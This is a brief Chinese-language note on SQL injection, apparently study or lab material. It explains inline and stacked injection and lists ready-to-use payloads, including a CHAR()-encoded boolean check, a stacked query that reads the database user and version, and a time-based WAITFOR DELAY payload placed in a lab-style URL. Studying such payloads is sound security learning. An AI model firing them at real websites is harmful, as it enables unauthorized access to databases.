内联注入和堆叠注入

一、内联注入

　　select id from (select 1 as id)a;

　　 select * from T1,T3 where T1.userid=T3.userid;

　　 select * from admin,news where admin.uid=news.tid;

 　　select * from admin where uid = 1 and (SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))

 二、堆叠注入

　　堆叠恶意sql语句，威胁度极高。

　　select * from news;select 1,2,3,4,user(),version();

　　payload：id=1;WAITFOR DELAY '0:0:5'--

　　http://……/less-2.asp?id=1;WAITFOR DELAY '0:0:5'--